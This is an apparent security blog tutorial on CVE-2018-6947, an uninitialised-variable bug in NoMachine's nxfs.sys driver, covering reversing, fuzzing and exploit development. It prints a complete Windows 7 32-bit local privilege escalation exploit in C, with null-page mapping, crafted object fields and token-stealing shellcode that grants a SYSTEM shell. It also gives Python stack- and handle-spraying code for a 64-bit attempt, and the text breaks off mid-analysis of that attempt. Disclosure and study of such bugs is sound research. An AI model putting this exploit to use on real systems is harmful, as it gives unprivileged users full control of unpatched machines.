NoMachine Un-initialised Variable Privilege Escalation – A fuzz-less exploit tutorial – CVE-2018-6947

Before we start..

In this post we will be walking through a vulnerability we identified in NoMachine version 6.0.66_2 and lower that can lead to privilege escalation or denial of service. To start this post, we would like to say a massive thank you to the NoMachine team who were awesome, they acknowledged and triaged our advisory the same day it was sent, and had a patch ready within a week – flawless example of how vulnerabilities should be handled.

This post contains the following sections:

  1. Introduction – initial analysis of the device driver & black box attempts at fuzzing.
  2. Static Analysis – walkthrough of our attempt to target the fuzzing & getting a crash.
  3. Exploit Development – walkthrough of developing an exploit for Win7 32bit.
  4. 64bit Exploit Development – attempts at kernel stack spraying and why they failed. Manipulating the uninitialized variable to gain code execution.

This post should show that with minimal knowledge of Windows kernel internals, we can utilise a bit of determination combined with a lot of curiosity to gain a working exploit.

TL;DR

An uninitialized stack variable is passed to obOpenObjectByPointer as the Object argument, with a user controllable address. The code path can be triggered by first issuing IOCTL 0x222014 with certain parameters to the nxfs device driver, followed by IOCTL 0x222030 to a newly created nxfs-net… device driver – on 32bit systems this can lead to privilege escalation as the stack variable is static, on 64bit systems privilege escalation can occur, however it is not 100% reliable.

Introduction

To start with, we will be working in a Windows 7 32bit VM with kernel debugging enabled. Upon downloading and installing NoMachine we noticed a few interesting files in its bin directory, mostly we saw it install a driver (nxfs.sys) in bin/drivers/nxdisk. This device driver is responsible for remotely mounting disks. The typical usage is shown here:

It turns out you don’t actually need to mount a remote disk to query this driver and, as it can be read and written to by any user, it’s a decent target for looking to get privilege escalation. We start this post by looking at trying to fuzz the device with IOCTLBF and IOCTLFuzzer, and we’ll see that without static analysis we would never have found this exploit.

To start with, we setup IOCTLFuzzer in “promiscuous” mode, basically not fuzzing anything, and interact with the NoMachine to see what IOCTLs are sent.  In the ioctlfuzzer.xml config file, we only add an entry for the allow section:

<allow>

    <driver val=”nxfs.sys” />

</allow>

The reason we set this entry is because without it we just end up fuzzing everything, which we don’t really want. Anyway, as soon as we try and connect a remote disk we get a load of output:

Note that if you try fuzzing the actual mounting of the disk you’ll get nowhere. We get even more output trying to read and write files, but essentially we only see a few IOCTL’s:

Moving on to another popular IOCTL fuzzer, IOCTLBF, we can use knowledge of 1 IOCTL to try and brute force the rest and then fuzz them. Again at this point we’ve not really tried targeting our fuzzing, it’s a pretty naïve approach.

We left that running for a while and it never found any valid IOCTLs. This is basically down to the fact that each IOCTL has a specific set of arguments, and will simply return an error if you don’t pass it the correct values (such as a size at a particular offset). The idea of this section was just to introduce the driver, try and get some low hanging fruit and at least see if it does have some interface we can access from user space. In the next section we drill down into reversing the driver to try and target our fuzzing.

Static Analysis

Loading the driver into IDA and jumping straight to the driver entry function and then sub_1CF86 we have the following block of code. Bear in mind that this is a filesystem driver, and so has to register certain handlers (such as reading and writing).

It turns out that this device driver is a fork of the open source project DokanFS, the source code of which is here: https://github.com/dokan-dev/dokany. I decided to focus on the IoControl code for whatever reason, although SetSecurityInfo, Read and Write etc may also be good targets to look at.

Looking at loc_14F8E, we instantly start seeing a few new IOCTL’s, but also some other values that are of interest. Essentially what is happening here is an IOCTL handler that also checks for certain types of “File”, edi is an internal structure held by the device driver, and at offset 0x0C, it keeps a magic number for what type of file it is. On a base install of NoMachine, the first device created is nxfs-709fd562-36b5-48c6-9952-302da6218061, and with a little bit of debugging we find that it has a magic number of 0x3A44474C, whenever you call DeviceIoControl with a handle to this device, you will always hit sub_14ADA.

Looking at sub_14ADA we get another set of IOCTL’s that it can handle:

Jumping ahead a bit, the IOCTL we want is 0x222014:

Sub_1219E is quite interesting, I won’t go over the whole function, the main point is that if you specify the correct values you’ll get a new device that has a new magic value.

As we can see here the input and output buffers we pass to the device need to be certain sizes. It then copies bytes over from our user buffer to the stack.

In the next block these values are then checked, mainly our buffer must contain 0x190 at offset 0, and 1 at offset +4

Skipping ahead (a lot), we basically end up creating a new device.

 

The code for this stage is as follows:

#include "stdafx.h"
#include <Windows.h>

#define DEVICE L"\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
#define IOCTL 0x00222014
#define OUT_SIZE 0x90
#define IN_SIZE 0x10

int main()
{
	char inBuff[IN_SIZE];
	char outBuff[OUT_SIZE];

	HANDLE handle = 0;
		
	DWORD returned = 0;
	memset(inBuff, 0x41, IN_SIZE);
	memset(outBuff, 0x43, OUT_SIZE);

	*(ULONG *)inBuff = 0x00000190;
	*(ULONG *)(inBuff + 4) = 0x00000001;
	
	handle = CreateFile(DEVICE,
			GENERIC_READ | GENERIC_WRITE,
			FILE_SHARE_READ | FILE_SHARE_WRITE,
			NULL,
			OPEN_EXISTING,
			FILE_ATTRIBUTE_NORMAL,
			0);

	if (handle == INVALID_HANDLE_VALUE)
	{
		printf("[x] Couldn't open device\n");
		exit(-1);
	}

	int ret = DeviceIoControl(handle,
			IOCTL,
			inBuff,
			IN_SIZE,
			outBuff,
			OUT_SIZE,
			&returned,
			0);
}

What do we get when we run this? Well:

The reason there is 3 devices with very nearly the same name is because I’ve run that code a few times whilst writing this post, I did play around with just having it running infinitely, in which case you get a whole load of those devices and my VM started freaking out. If anyone knows of any vulnerabilities involved with arbitrarily creating devices please let us know.

So at this point we have a new device, and without going into it too much, we have its magic number as 0x3A564342. Back in the IOCTL handler this had a variety of IOCTLs associated with it:

We have:

  1. 0x222008
  2. 0x22200c
  3. 0x222010
  4. 0x22201a
  5. 0x222027
  6. 0x22202c
  7. 0x222030

Note that we only saw the first two of these control codes when fuzzing with IOCTLFuzzer. Let’s see what happens if we try and fuzz the “nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}” device with IOCTLBF. We start with 0x222030 and instantly get a crash:

With hindsight set at 20/20, we know that the first argument to ObOpenObjectByPointer is supposed to be the object’s address, 0x06000000 doesn’t look quite right, and the access violation has occurred due to an invalid read. At first we didn’t know if this was exploitable, and in the next section we will walkthrough a series of “I wonder what happens if…” which lead us to a privilege escalation exploit.

Exploit Development

We’ve seen that we get an invalid read access violation, the next logical step is to do some root cause analysis. Starting with the handler for the vulnerable control code (0x222030) sub_1633E. This function has something to do with getting a handle to a token object, and can only be called from user mode.

It then does some length checking on the input and output buffer sizes:

It acquires a spinlock and does some looping, and eventually calls obOpenObjectByPointer:

Remember that the first argument (esi) is the one we think is incorrect, moving backwards we see that esi is the second argument to this function:

It turns out that the second argument is actually the Interrupt request packet (IRP):

One value in particular looks interesting here, 0x06000000 at offset 0x24 (little endian). Just before the call to obOpenObjectByPointer we have the following block:

Notice how a value is copied into esi, from esi+0x24, it doesn’t matter how many times this function is called, it will always be 0x06000000, which is IRP.Cancel.

Being relatively new to Windows kernel exploitation, it took a while to figure out how to exploit this issue. We know that 0x06000000 is mappable, so we thought lets see what happens when we map that address, do we get a new crash? We use the following code to first create the vulnerable device, and then issue the vulnerable IOCTL to it (the first part of the code is cut out because it hasn’t changed):

#include "stdafx.h"
#include <Windows.h>

#define DEVICE L"\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
#define DEVICE2 L"\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}"
#define IOCTL 0x00222014
#define IOCTL2 0x00222030
#define OUT_SIZE 0x90
#define IN_SIZE 0x10

int main()
{
	<...Snip...>
	HMODULE module = LoadLibraryA("ntdll.dll");
	PNtAllocateVirtualMemory AllocMemory = (PNtAllocateVirtualMemory)GetProcAddress(module, "NtAllocateVirtualMemory");
	
	SIZE_T size = 0x1000;
	PVOID address1 = (PVOID)0x05ffff00;
	
	NTSTATUS allocStatus = AllocMemory(GetCurrentProcess(),
		&address1,
		0,
		&size,
		MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
		PAGE_EXECUTE_READWRITE);
	
	if (allocStatus != 0)
	{
		printf("[x]Couldnt alloc page\n");
		exit(-1);
	}
	
	//create the nxfs-net device.
	int ret = DeviceIoControl(handle,
			IOCTL,
			inBuff,
			IN_SIZE,
			outBuff,
			OUT_SIZE,
			&returned,
			0);
			
	HANDLE handle2 = CreateFile(DEVICE2,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		0);

	char inBuff2[0x30];
	char outBuff2[0x30];

	ret = DeviceIoControl(handle2,
		IOCTL2,
		inBuff2,
		0x30,
		outBuff2,
		0x30,
		&returned,
		0);
}

Interestingly enough, we don’t get any crashes, nor do we if we fill the memory with random data. Determined to carry on, we decided to have a look at what exactly obOpenObjectByPointer (and the other related functions it calls) do. Setting a breakpoint just on the call at nxfs+0x6516 we first hit obOpenObjectByPointer. It turns out this function just pushes a load of arguments for another function:

nt!ObOpenObjectByPointer:
82c8ca78 8bff mov edi,edi
82c8ca7a 55 push ebp
82c8ca7b 8bec mov ebp,esp
82c8ca7d ff7520 push dword ptr [ebp+20h]
82c8ca80 6844666c74 push 746C6644h ;“Dlft”
82c8ca85 ff751c push dword ptr [ebp+1Ch]
82c8ca88 ff7518 push dword ptr [ebp+18h]
82c8ca8b ff7514 push dword ptr [ebp+14h]
82c8ca8e ff7510 push dword ptr [ebp+10h]
82c8ca91 ff750c push dword ptr [ebp+0Ch]
82c8ca94 ff7508 push dword ptr [ebp+8] ;0x06000000
82c8ca97 e8f74effff call nt!ObOpenObjectByPointerWithTag (82c81993)
82c8ca9c 5d pop ebp
82c8ca9d c21c00 ret 1Ch

OpenObjectByPointerWithTag calls:

82c81993 mov edi,edi
82c81995 push ebp
82c81996 mov ebp,esp
82c81998 and esp,0FFFFFFF8h
82c8199b 81ec44010000 sub esp,144h
82c819a1 a1948ab682 mov eax,dword ptr [nt!__security_cookie (82b68a94)]
&lt;…Snip…&gt;
82c819cc 57 push edi ;NULL
82c819cd 53 push ebx ;0x06000000
82c819ce e8e7cee3ff call nt!ObReferenceObjectByPointerWithTag (82abe8ba)

And next, in ObReferenceObjectByPointerWithTag we start getting some results:

nt!ObReferenceObjectByPointerWithTag:
82abe8ba mov edi,edi
82abe8bc push ebp
82abe8bd mov ebp,esp
82abe8bf mov eax,dword ptr [ebp+10h]
82abe8c2 push esi
82abe8c3 mov esi,dword ptr [ebp+8] ;esi = 0x06000000
82abe8c6 add esi,0FFFFFFE8h ;esi -= 24
82abe8c9 test eax,eax
82abe8cb jne nt!ObReferenceObjectByPointerWithTag+0x1f (82abe8d9)
82abe8cd cmp byte ptr [ebp+14h],al
82abe8d0 je nt!ObReferenceObjectByPointerWithTag+0x2c (82abe8e6)
82abe8d2 mov eax,0C0000024h
82abe8d7 jmp nt!ObReferenceObjectByPointerWithTag+0x50 (82abe90a)
82abe8d9 movzx ecx,byte ptr [esi+0Ch] ;ecx = [0x06000000-0xc] = 0x05fffff4
82abe8dd cmp dword ptr nt!ObTypeIndexTable (82b81ee0)[ecx*4],eax ********
82abe8e4 jmp nt!ObReferenceObjectByPointerWithTag+0x16 (82abe8d0)
82abe8e6 push ebx

The interesting part here is the ObTypeIndexTable, we know from our previous Windows kernel exploit this is a table into the different object types:

Notice that the value held in eax is the 5th index into the table (which is a Token object), so we decide to see what happens when we set 0x05fffff4 to 5. We don’t exit, which is good, instead we end up hitting this code which sets a lock:

82abe8dd cmp dword ptr nt!ObTypeIndexTable (82b81ee0)[ecx*4],eax
&lt;…Snip…&gt;
82abe903 lock xadd dword ptr [esi],ebx ds:0023:05ffffe8=43434343
82abe907 xor eax,eax
82abe909 pop ebx
82abe90a pop esi
82abe90b pop ebp
82abe90c ret 14h

We return to ObReferenceObjectByPointerWithTag, and let execution continue until we get another access violation:

nt!SepTokenDeleteMethod:
82c9a513 mov edi,edi
82c9a515 push ebp
82c9a516 mov ebp,esp
82c9a518 sub esp,10h
82c9a51b push ebx
82c9a51c push esi
82c9a51d mov esi,dword ptr [ebp+8] ;esi = 0x06000000
82c9a520 test byte ptr [esi+0ACh],20h
82c9a527 push edi
82c9a528 jne nt!SepTokenDeleteMethod+0x4f (82c9a562) ;if 0x060000ac == 0x20
82c9a52a mov ecx,dword ptr [esi+0BCh]
82c9a530 lea edx,[ecx+14h]
82c9a533 mov eax,dword ptr [edx] ds:0023:00000014=????????
82c9a535 mov dword ptr [ebp+8],eax
82c9a538 cmp eax,1
82c9a53b je nt!SepTokenDeleteMethod+0x3a (82c9a54d)
&lt;…Snip…&gt;
82c9a562 mov ecx,dword ptr [esi+1DCh] ;grab some pointer from 0x060001dc
82c9a568 xor ebx,ebx
82c9a56a cmp ecx,ebx ;check it isn’t null
82c9a56c je nt!SepTokenDeleteMethod+0x60 (82c9a573)
82c9a56e call nt!ObfDereferenceObject (82ab43f3) ***We want this code path
82c9a573 cmp byte ptr [esi+73h],2

We decide to set 0x060000ac to 0x20, and instead of running the code again, simply flip eip around a bit and carry on. When we get to SepTokenDeleteMethod+0x4f (82c9a562), we see that we can’t have a null pointer at 0x060001dc, its clearly got to be a valid pointer, so we decide to put a value we know is mapped in memory, 0x05ffff00.

At this point, our code has the following values at certain offsets:

[

*(ULONG *)0x05fffff4 = 5;
*(ULONG *)0x060000ac = 0x20;
*(ULONG *)0x060001dc = 0x05ffff00;

This gives us the following new bugcheck:

Looking at the call stack, the bugcheck occurred in ObfDereferenceObjectWithTag:

82ab4407 833d0c64b78200 cmp dword ptr [nt!ObpTraceFlags (82b7640c)],0
82ab440e push ebx
82ab440f push esi
82ab4410 push edi
82ab4411 mov edi,ecx
82ab4413 lea esi,[edi-18h] ;esi = 0x05ffff00 – 0x18
82ab4416 je nt!ObfDereferenceObjectWithTag+0x22 (82ab4429)
82ab4418 test byte ptr [esi+0Dh],1
82ab441c je nt!ObfDereferenceObjectWithTag+0x22 (82ab4429)
&lt;…Snip…&gt;
82ab4429 mov eax,esi
82ab442b or ebx,0FFFFFFFFh
82ab442e lock xadd dword ptr [eax],ebx ;dereference count
82ab4432 dec ebx
82ab4433 jne nt!ObfDereferenceObjectWithTag+0x97 (82ab449f)
82ab4435 mov eax,dword ptr [esi+4]
82ab4438 test eax,eax
82ab443a je nt!ObfDereferenceObjectWithTag+0x4b (82ab4453)
82ab443c push eax
82ab443d movzx eax,byte ptr [edi-0Ch]
82ab4441 push 1
82ab4443 push edi
82ab4444 push dword ptr nt!ObTypeIndexTable (82b81ee0)[eax*4]
82ab444b push 18h
82ab444d call nt!KeBugCheckEx (82b1ad62)

Put simply, if the value at 0x05ffff00 – 0x18 is 0, then we end up hitting the bugcheck call, simplest thing to do is to just set it to 1. Skipping forward slightly, the final offset we need to set is 0x05ffff00 – 0x14, which needs to equal 0. Our code is then has the following offsets:

*(ULONG *)0x05fffff4 = 5;
*(ULONG *)0x060000ac = 0x20;
*(ULONG *)0x060001dc = 0x05ffff00;
*(ULONG *)(0x05ffff00 – 0x18) = 1;
*(ULONG *)(0x05ffff00 – 0x14) = 0;

And running it gives us yet another access violation, but this one looks a lot more promising (note that ebx=0). If we mapped a null page and set 0x64 to some function, then the check at 82C624EF would fail.

The easiest way to test our theory is to simply set 0x64 to point to a function in userspace that sets a breakpoint. For example:

__declspec(naked)VOID kernel_breakpoint()
{
	__asm{
	              int 3
                }
}

We hit our breakpoint, but there’s one main thing to point out, this has happened during the exit of our process. We tried various ways of triggering ObpRemoveObjectRoutine (such as closing handles etc) but to no avail. What this means is that when we write our shellcode, we need to steal a SYSTEM token and put it in the parent processes token (the parent being cmd.exe from which we launched the exploit). The other problem that took a while to figure out was where to return, if we return to ObpRemoveObjectRoutine+59, we end up calling ObpFreeObject which causes more issues.

It turns out that after a lot of trial and error, we can actually do a really hacky fix. We can return to the second call to ObpRemoveObjectRoutine, fix the stack, and change the return address a little bit so we skip over the call to ObpFreeObject.

The shellcode is relatively simple:

__declspec(naked)VOID TokenStealingShellcode()
{
	__asm{
	int 3;
	xor eax, eax;
	mov eax, fs:[eax + KTHREAD_OFFSET];
	mov eax, [eax + EPROCESS_OFFSET];
	mov esi, [eax + PARENT_PID]    ; Get parent pid 

              ;Search for the parent process
	Loop1:
		mov eax, [eax + FLINK_OFFSET];
		sub eax, FLINK_OFFSET;
		cmp esi, [eax + PID_OFFSET];
		jne Loop1;
	
	mov ecx, eax;
	mov ebx, [eax + TOKEN_OFFSET];  
	mov edx, SYSTEM_PID;

	;Look for a SYSTEM process
               Search:
		mov eax, [eax + FLINK_OFFSET];
		sub eax, FLINK_OFFSET;
		cmp[eax + PID_OFFSET], edx;
		jne Search;
	
              ;Steal its token, placing it in the Parents token.
	mov edx, [eax + TOKEN_OFFSET];
	mov[ecx + TOKEN_OFFSET], edx;
             }
}

Again, we place an int 3 breakpoint at the start of the code so that it’s easier to debug.

As we can see from the figure above, our shellcode is at a place where it should return, looking at the callstack again, we need to get back to ObpRemoveObjectRoutine, but the second stack frame not the one that called our shellcode. To do this we need to fix the stack by adding 0x58 to it. This then lands us in the call to ObpFreeObject:

82c624fd               push    eax
82c624fe               call    dword ptr [edi+64h]
82c62501              call    nt!ObpFreeObject (82c62512)
82c62506              pop     edi

However, if we just add 5 to the return address, we skip past it and exit cleanly. It’s not pretty, but it works consistently. We add the following stub to the end of the shellcode:

add esp, 0x58;
add[esp], 5;
ret 4;

Putting it all together, we get the following code, and a SYSTEM shell:

#include "stdafx.h"
#include <Windows.h>

#define DEVICE L"\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
#define DEVICE2 L"\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}"
#define IOCTL 0x00222014
#define IOCTL2 0x00222030
#define OUT_SIZE 0x90
#define IN_SIZE 0x10

#define KTHREAD_OFFSET 0x124
#define EPROCESS_OFFSET 0x050
#define PID_OFFSET 0x0b4
#define FLINK_OFFSET 0x0b8
#define TOKEN_OFFSET 0x0f8
#define SYSTEM_PID 0x004
#define PARENT_PID 0x140

__declspec(naked)VOID TokenStealingShellcode()
{
	__asm{
	xor eax, eax;
	mov eax, fs:[eax + KTHREAD_OFFSET];
	mov eax, [eax + EPROCESS_OFFSET];
	mov esi, [eax + PARENT_PID]; Get parent pid 

	Loop1:
		mov eax, [eax + FLINK_OFFSET];
		sub eax, FLINK_OFFSET;
		cmp esi, [eax + PID_OFFSET];
		jne Loop1;
	
	mov ecx, eax;
	mov ebx, [eax + TOKEN_OFFSET];
	mov edx, SYSTEM_PID;

	Search:
		mov eax, [eax + FLINK_OFFSET];
		sub eax, FLINK_OFFSET;
		cmp[eax + PID_OFFSET], edx;
		jne Search;
	
	mov edx, [eax + TOKEN_OFFSET];
	mov[ecx + TOKEN_OFFSET], edx;
	add esp, 0x58;
	add[esp], 5;
	ret 4;
	}
}

typedef NTSTATUS(WINAPI *PNtAllocateVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	ULONG ZeroBits,
	PULONG AllocationSize,
	ULONG AllocationType,
	ULONG Protect
	);

typedef NTSTATUS(WINAPI *PNtFreeVirtualMemory)(
	HANDLE ProcessHandle,
	PVOID *BaseAddress,
	PULONG RegionSize,
	ULONG FreeType
	);

int main()
{
	HMODULE module = LoadLibraryA("ntdll.dll");
	PNtAllocateVirtualMemory AllocMemory = (PNtAllocateVirtualMemory)GetProcAddress(module, "NtAllocateVirtualMemory");
	PNtFreeVirtualMemory FreeMemory = (PNtFreeVirtualMemory)GetProcAddress(module, "NtFreeVirtualMemory");

	SIZE_T size = 0x1000;
	PVOID address1 = (PVOID)0x05ffff00;
	

	NTSTATUS allocStatus = AllocMemory(GetCurrentProcess(),
		&address1,
		0,
		&size,
		MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
		PAGE_EXECUTE_READWRITE);
	
	if (allocStatus != 0)
	{
		printf("[x]Couldnt alloc page\n");
		exit(-1);
	}
	printf("[+] Allocated address at %p\n", address1);
	*(ULONG *)0x05fffff4 = 5;
	*(ULONG *)0x060000ac = 0x20;
	*(ULONG *)0x060001dc = 0x05ffff00;
	*(ULONG *)(0x05ffff00 - 0x18) = 1;
	*(ULONG *)(0x05ffff00 - 0x14) = 0;
	
	PVOID address2 = (PVOID)0x1;
	SIZE_T size2 = 0x1000;
	
	allocStatus = AllocMemory(GetCurrentProcess(),
		&address2,
		0,
		&size2,
		MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
		PAGE_EXECUTE_READWRITE);

	if (allocStatus != 0)
	{
		printf("[x]Couldnt alloc page2\n");
		exit(-1);
	}
	*(ULONG *)0x64 = (ULONG)&TokenStealingShellcode;
	printf("[+] Mapped null page\n");

	char inBuff[IN_SIZE];
	char outBuff[OUT_SIZE];

	HANDLE handle = 0;
		
	DWORD returned = 0;
	memset(inBuff, 0x41, IN_SIZE);
	memset(outBuff, 0x43, OUT_SIZE);

	*(ULONG *)inBuff = 0x00000190;
	*(ULONG *)(inBuff + 4) = 0x00000001;
	
	printf("[+] Creating nxfs-net... device through IOCTL 222014\n");
	handle = CreateFile(DEVICE,
			GENERIC_READ | GENERIC_WRITE,
			FILE_SHARE_READ | FILE_SHARE_WRITE,
			NULL,
			OPEN_EXISTING,
			FILE_ATTRIBUTE_NORMAL,
			0);

	if (handle == INVALID_HANDLE_VALUE)
	{
		printf("[x] Couldn't open device\n");
		exit(-1);
	}

	int ret = DeviceIoControl(handle,
			IOCTL,
			inBuff,
			IN_SIZE,
			outBuff,
			OUT_SIZE,
			&returned,
			0);

	HANDLE handle2 = CreateFile(DEVICE2,
		GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		0);

	char inBuff2[0x30];
	char outBuff2[0x30];

	printf("[+] Triggering exploit...");

	ret = DeviceIoControl(handle2,
		IOCTL2,
		inBuff2,
		0x30,
		outBuff2,
		0x30,
		&returned,
		0);
	
	return 0;
}

64-bit Exploit Development

It turns out that in our 32 bit exploit we got extremely lucky given the object argument passed to obOpenObjectByPointer was something we could map in userspace. In general, when we want to exploit uninitialized stack variables in kernel space, we need to spray the stack. The idea is that if you can call a kernel space function that copies a large amount of user controllable values into a kernel stack buffer, then you may be able to control the uninitialized variable. A good introduction to this is given by j00ru (http://j00ru.vexillium.org/?p=769). We fire up a Windows 7 64bit VM and see whether we can control the uninitialized variable, using the following python code:

from ctypes import *
from ctypes.wintypes import *
import struct
import sys
import os

MEM_COMMIT = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040
GENERIC_READ = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
STATUS_INVALID_HANDLE = 0xC0000008

def str_to_pchar(string):
	pString = c_char_p(string)
	return pString

def get_handle(device_name):
	return windll.kernel32.CreateFileA(device_name,
		GENERIC_READ | GENERIC_WRITE,
		0,
		None,
		OPEN_EXISTING,
		0,
		None)


handle = get_handle(“\\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061”)

if handle == STATUS_INVALID_HANDLE:
	print "[x] Couldn’t get handle to \\\\.\\nxfs-709fd562-36b5-48c6-9952-302da6218061"
	sys.exit(-1)

#if we have a valid handle, we now need to send ioctl 0x222014
#this creates a new device for which ioctl 0x222030 can be sent
in_buff = struct.pack("<I", 0x190) + struct.pack("<I", 0x1) + "AA"
in_buff = str_to_pchar(in_buff) 
out_buff = str_to_pchar("A"*0x90) 
bytes_ret = c_ulong() 
ret = windll.kernel32.DeviceIoControl(handle, 0x222014, in_buff, 0x10, out_buff, 0x90, byref(bytes_ret), 0) 

if ret == 0: 
	print "[x] IOCTL 0x222014 failed" 
	sys.exit(-1) 
	
print "[+] IOCTL 0x222014 returned success"

#get a handle to the next device for which we can send the vulnerable ioctl. 
print "[+] Getting handle to \\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}" 
handle = get_handle("\\\\.\\nxfs-net-709fd562-36b5-48c6-9952-302da6218061{709fd562-36b5-48c6-9952-302da6218061}") 

if handle == STATUS_INVALID_HANDLE: 
	print "[x] Couldn’t get handle" 
	sys.exit(-1) 
	
print "[+] Spraying stack" 

spray_buff = str_to_pchar("C"*2048*8) 
windll.ntdll.NtMapUserPhysicalPages(None, 1024, spray_buff) 
in_buff = str_to_pchar("A"*0x30) 
out_buff = str_to_pchar("B"*0x30) 
windll.kernel32.DeviceIoControl(handle, 0x222030, in_buff, 0x30, out_buff, 0x30, byref(bytes_ret), 0)

We then set a breakpoint in the vulnerable function just after the prologue and examine the stack:

kd&gt; dq rsp L100
fffff880`0535b800 fffff800`02a3de80 43434343`43434343
fffff880`0535b810 fffff880`0535b9b8 fffff880`0535bb60
fffff880`0535b820 fffffa80`04360260 fffff880`028ac87c
fffff880`0535b830 00000000`00000010 00000000`00000344
fffff880`0535b840 fffff880`0535b850 00000000`00000018
fffff880`0535b850 fffffa80`02160940 00000000`00000000
fffff880`0535b860 fffffa80`043e99e0 fffff880`028ab6e1
fffff880`0535b870 00000000`c0000002 fffffa80`02160940
fffff880`0535b880 00000000`00395a98 00000000`00000000
fffff880`0535b890 fffffa80`02be15c0 fffffa80`043a8408
fffff880`0535b8a0 fffffa80`c0000002 fffffa80`043a82f0
fffff880`0535b8b0 00000000`00000001 00000000`00000030
fffff880`0535b8c0 fffffa80`043a82f0 fffff800`02be5f97
fffff880`0535b8d0 fffffa80`043a8408 fffff880`0535bb60
fffff880`0535b8e0 fffffa80`043bcd50 fffffa80`043bcd50
fffff880`0535b8f0 00000000`746c6644 fffff880`0535b928
fffff880`0535b900 fffff880`0535b968 00000000`00000000
fffff880`0535b910 00000000`00000000 43434343`43434343
fffff880`0535b920 00000030`04360201 fffffa80`043bcd50
fffff880`0535b930 00000000`00000030 00000000`00000000
fffff880`0535b940 fffffa80`043a82f0 43434343`43434343
fffff880`0535b950 43434343`43434343 fffffa80`043bcda0
fffff880`0535b960 43434343`43434343 0012019f`00000000
fffff880`0535b970 fffffa80`043bce00 fffffa80`02be15c0
fffff880`0535b980 43434343`43434343 fffffa80`043bcde8
fffff880`0535b990 43434343`43434343 fffffa80`043bcd50

We can see we clearly have some values left over on the stack, it looks slightly promising. If we then move on to this block of code:

RSI is going to get a value from the stack, and this is what we want to control. Unfortunately it turns out we can’t get any controllable values there:

kd&gt; dq rsp+80
fffff880`0535b880 00000000`00395a98 00000000`00000000

This value must be placed on the stack after our spraying, or it just isn’t at a location we manage to influence. Our next thought was to try and map this address, adding the following code to our script:


MEM_COMMIT  = 0x00001000
MEM_RESERVE = 0x00002000
PAGE_EXECUTE_READWRITE = 0x00000040

address = c_void_p(0x00395a98)
size = c_int(0x1000)
proc = windll.kernel32.GetCurrentProcess()

print "[+] Allocating memory at 0x%x" %address.value

dwStatus = windll.ntdll.NtAllocateVirtualMemory(c_void_p(proc),
                                            byref(address), 0,
                                            byref(size),
                                            MEM_RESERVE|MEM_COMMIT,
                                            PAGE_EXECUTE_READWRITE)

print "[+] NtAllocVM returned %x" %c_ulong(dwStatus).value
print "\tsize 0x%x" %size.value
if dwStatus != 0:
    sys.exit(-1)
print "\t%s"%hex(address.value)

Unfortunately, on the Windows 7 VM we can’t map this address due to a STATUS_CONFLICTING_ADDRESSES error. Sometimes we can map it, and sometimes we can’t. The next problem is that this value isn’t fixed, it changes on every execution.

We obviously can’t map 0x4141414141414141, so we spray the memory allocation with 0x0000000041414141, sometimes we get it spot on:

Other times it is completely off:

Again, determined to carry on, and on a complete whim we thought “I wonder what happens if I open a whole load of handles to the device”. For whatever reason this gives us the ability to influence this value, if we open up say 10,000 handles we go from a value in the 0x370000-0x400000 range to much higher values:

Clearly this value isn’t representative of the number of handles that are open, however whatever is happening in the kernel internally by creating these handles is influencing it. This means that if we increase it substantially, with a bit of trial and error we can hope to guess its range. Bear in mind that we have issues trying to map 3 byte addresses, so we increase the number of handles substantially, creating 900,000 gives the following:

We found that 900,000 handles gives us reliable control of the value for rsi, however there is still the chance that we end up pointing to 0x4141414000000000 instead of 0x0000000041414140, and we couldn’t determine how to control this.

If we do get the correct value for rsi, then we 0x41414140-0x18 to 5 as before, and then the program exits, giving us the following error:

FAULTING_IP:
nt!SepTokenDeleteMethod+27
fffff800`02b93937 8b4218 mov eax,dword ptr [rdx+18h]

CONTEXT: fffff88004cafda0 — (.cxr 0xfffff88004cafda0)
rax=0000000041414138 rbx=0000000000000000 rcx=0000000041414140
rdx=0000000000000000 rsi=fffffa800184bd70 rdi=0000000041414140
rip=fffff80002b93937 rsp=fffff88004cb0780 rbp=fffff8a00206cc40
r8=fffff8a006198940 r9=0000000000372650 r10=0000000000372650
r11=fffff88004cb0808 r12=0000000041414110 r13=fffffa8008667060
r14=0000000000000000 r15=fffff8a00206cc40
iopl=0 nv up ei pl zr na po nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010246
nt!SepTokenDeleteMethod+0x27:
fffff800`02b93937 8b4218 mov eax,dword ptr [rdx+18h] ds:002b:00000000`00000018=????????

Unfortunately, we couldn’t see anywhere in SepTokenDeleteMethod that would allow us to gain code execution. After a bit of research we stumbled on a presentation by Nikita Tarakanov http://2014.zeronights.org/assets/files/slides/data-only-pwning-windows-kernel.pptx, the section that caught our attention is where they mention object type confusion. Put simply, we control the value that indexes obTypeIndexTable, with a value of 5 we are pointing to a Token object:

If however, right before our process terminates, we set this value to 1, then the following code path is hit in ObpCloseHandleTableEntry:

fffff800`02bc23ed lea rbx,[nt!ObTypeIndexTable (fffff800`02a75340)] ;rbx gets address of index table
&lt;..Snip&gt;
fffff800`02bc23fe movzx eax,byte ptr [r12+18h] ;al gets our controllable index value.
fffff800`02bc2404 mov r13,r8
fffff800`02bc2407 mov rdi,rdx
fffff800`02bc240a mov rbx,qword ptr [rbx+rax*8] ;index the table with our offset.
